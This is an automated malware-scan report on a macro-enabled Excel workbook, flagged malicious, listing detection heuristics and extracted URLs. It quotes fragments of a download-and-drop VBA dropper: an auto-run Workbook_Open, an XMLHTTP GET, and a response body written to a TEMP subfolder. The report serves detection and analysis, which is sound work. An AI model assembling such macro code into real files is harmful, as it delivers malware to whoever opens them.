MALICIOUS
196
Risk Score
Heuristics 10
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile targetFileXLSX, 2 ' 1 = no overwrite, 2 = overwrite -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") WinHttpReq.Open "GET", URL, False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() SplashScreen.Show -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
targetFolder = VBA.Environ("TEMP") & "\" & RandomString(6) & "\" MkDir targetFolder -
External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKSDocument contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Large OOXML part skipped info SCAN_INCOMPLETEOne or more high-value OOXML parts exceeded the scanner's per-entry size cap and may not have been fully inspected.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.imagemagick.org.��z Referenced by macro
- https://etoro.tw/2L4Kwq3Referenced by macro
- http://www.w3.org/2000/svgReferenced by macro
- http://www.w3.org/1999/xlinkReferenced by macro
- http://schemas.microsoft.com/office/2006/01/customuiReferenced by macro
- https://en.wikipedia.org/wiki/File:ATP_World_Tour.png�W]�Referenced by macro
- https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-linkReferenced by macro
- https://www.binance.com/?ref=18552868Referenced by macro
Open this report in the interactive analyzer, or submit your own file for analysis.